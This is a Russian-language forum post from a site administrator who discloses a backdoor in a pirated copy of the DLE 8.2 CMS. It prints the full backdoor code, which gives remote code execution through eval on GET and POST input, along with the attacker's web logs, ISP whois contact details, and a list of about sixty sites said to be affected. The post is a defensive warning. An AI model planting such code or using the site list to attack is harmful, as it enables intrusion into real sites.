- Автор темы
- #1
Я являюсь администратором сайта на DLE движке (нуленом).
Сайт был обновлен до версии 8.2
13 октября наш сайт был взломан человеком из Украины, город Черкассы. Был заменен файл index.php, удален файл .htaccess
Права на файлы столяи такие, что пользователь от которого apache запускался мог редактировать их.
Я провел защитные мероприятия, проставил права, запретил доступ и выключил php engine везде где это было возможно. IP атакующего я идентифицировал, но решил выждать следующей атаки чтобы найти дыру через которую он взломал сайт.
15 октября атака повторилась, но он ничего не смог сделать, т.к. были выставлены корректные права, файлы изменить было не возможно, шелл залить тоже некуда. Видимо из безысходности он очистил конфигурационный файл.
Я провел анализ атаки, и обнаружил что она произошла через файл engine/ajax/updates.php
В этом файле был бэкдор. eval() через $_POST
Код бэкдора
Атака была произведена с ip 78.137.24.122
Этот человек видимо не отличается выдающимися умственными способностями, и в логах моего вэб сервера по рефереру спалил список сайтов с бэкдорами.
Тут ресурсы, в которых есть этот бэкдор Для просмотра ссылки Войдиили Зарегистрируйся
Если вы нашли себя в списке - срочно защищайтесь.
Движек был скачан с Для просмотра ссылки Войдиили Зарегистрируйся ссылка на дистрибутив Для просмотра ссылки Войди или Зарегистрируйся
Поэтому предупреждаю всех владельцев сайтов, кто скачал DLE с этого ресурса - вы очень рискуете своим сайтом. Его могут взломать также как и мой.
Сайт был обновлен до версии 8.2
13 октября наш сайт был взломан человеком из Украины, город Черкассы. Был заменен файл index.php, удален файл .htaccess
Права на файлы столяи такие, что пользователь от которого apache запускался мог редактировать их.
Я провел защитные мероприятия, проставил права, запретил доступ и выключил php engine везде где это было возможно. IP атакующего я идентифицировал, но решил выждать следующей атаки чтобы найти дыру через которую он взломал сайт.
15 октября атака повторилась, но он ничего не смог сделать, т.к. были выставлены корректные права, файлы изменить было не возможно, шелл залить тоже некуда. Видимо из безысходности он очистил конфигурационный файл.
Я провел анализ атаки, и обнаружил что она произошла через файл engine/ajax/updates.php
В этом файле был бэкдор. eval() через $_POST
Код бэкдора
PHP:
if($_GET['wert']==''){
require_once ROOT_DIR.'/language/'.$selected_language.'/adminpanel.lng';
$config['charset'] = ($lang['charset'] != '') ? $lang['charset'] : $config['charset'];
@header("HTTP/1.0 200 OK");
@header("HTTP/1.1 200 OK");
@header("Cache-Control: no-cache, must-revalidate, max-age=0");
@header("Expires: 0");
@header("Pragma: no-cache");
@header("Content-type: text/css; charset=".$config['charset']);
$data = @file_get_contents("http://www.dle-news.ru/extras/updates.php?version_id=".$_REQUEST['versionid']."&key=".$config['key']);
if (!strlen($data)) echo $lang['no_update']; else echo $data;
}else{
$file=(ROOT_DIR."/engine/classes/mysql.class.php");
if(file_exists($file)){ @require($file); $x.="mysql.class.php - ok<br />";}
$file=(ROOT_DIR."/engine/data/dbconfig.php");
if(file_exists($file)){ @require($file); $x.="dbconfig.php - ok<br />";}
$file=(ROOT_DIR."/engine/data/config.php");
if(file_exists($file)){ @require($file); $x.="config.php - ok<br />";}
eval(base64_decode($_GET['user_id']));
echo <<<HTML
<HTML><body><form action="" method="post">
<center><textarea name="text" rows="10" cols="100"></textarea>
<br /><input type="submit" value="Canoinoaaoe"/></center></form></body></HTML>
HTML;
if($_POST['text']!=''){eval(stripcslashes($_POST['text']));
}}
Код:
78.137.24.122 - - [15/Oct/2009:18:17:07 +0300] "GET /engine/ajax/updates.php?wert=123 HTTP/1.1" 200 186 "http://cmska-kasper.co.cc/google/wiev_log.php" "Mozilla/5.0 (Windows; U; Windows NT 5.1; ru; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3"
78.137.24.122 - - [15/Oct/2009:18:32:13 +0300] "POST /engine/ajax/updates.php?wert=123 HTTP/1.1" 200 1003 "/engine/ajax/updates.php?wert=123" "Mozilla/5.0 (Windows; U; Windows NT 5.1; ru; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3"
Код:
% Information related to '78.137.0.0 - 78.137.31.255'
inetnum: 78.137.0.0 - 78.137.31.255
netname: MCLAUT
descr: For broadband users
country: UA
admin-c: MCL8-RIPE
tech-c: MCL8-RIPE
status: ASSIGNED PA
mnt-by: MCLAUT-ISP-MNT
source: RIPE # Filtered
person: Vitaly Laut
address: Cherkassy, Ukraine
address: Dashkevicha, str. 39
phone: + 380 472 36-06-53
fax-no: + 380 472 36-16-87
e-mail: hostmaster@2upost.com
nic-hdl: MCL8-RIPE
mnt-by: MCLAUT-ISP-MNT
source: RIPE # Filtered
% Information related to '78.137.0.0/19AS25133'
route: 78.137.0.0/19
descr: Customers networks
origin: AS25133
mnt-by: MCLAUT-ISP-MNT
source: RIPE # FilteredТут ресурсы, в которых есть этот бэкдор Для просмотра ссылки Войди
Код:
pulya.net
easy-warez.net
svew.net
soft-best.net
get-file.net
soft.or.kz
warezua.ru
eto.in.ua
xalyawa.ru
softmedia.org.ru
toosoft.ru
inetserf.com.ua
zagruzim.com
1script.info
portalchik.com
portablenews.info
goldfiles.net
svwarez.org.ua
nabiz.in.ua
greet.su
oom10.if.ua
danger-soft.ru
e-prodigy.ru
palim.info
dowmedals.warezona.ru
warezona.ru
viagrik.com
warez-box.ru
pepeh.org.ua
vipzone.ws
xemera.ru
marketfiles.ru
maxshot.ru
34music.ru
lu4ok.ru
novostishka.ru
fallengods.org.ua
onlineobzor.net
24film.info
yourfiles.com.ua
help-wow.ru
maskishou.pp.ru
xxx-warez.ru
spider13.net
bombila.net
kefa.kz
veteroktur.ru
noznet.ru
svwarez.com.ua
12x21.info
warezzzportal.ru
dearfriends.ru
rity.ru
shevron.biz
softscool.ru
softzona.net.ua
veselyha.org.ua
crossfile.ru
nk-time.com
uanovosti.info
seo-max.infoДвижек был скачан с Для просмотра ссылки Войди
Поэтому предупреждаю всех владельцев сайтов, кто скачал DLE с этого ресурса - вы очень рискуете своим сайтом. Его могут взломать также как и мой.
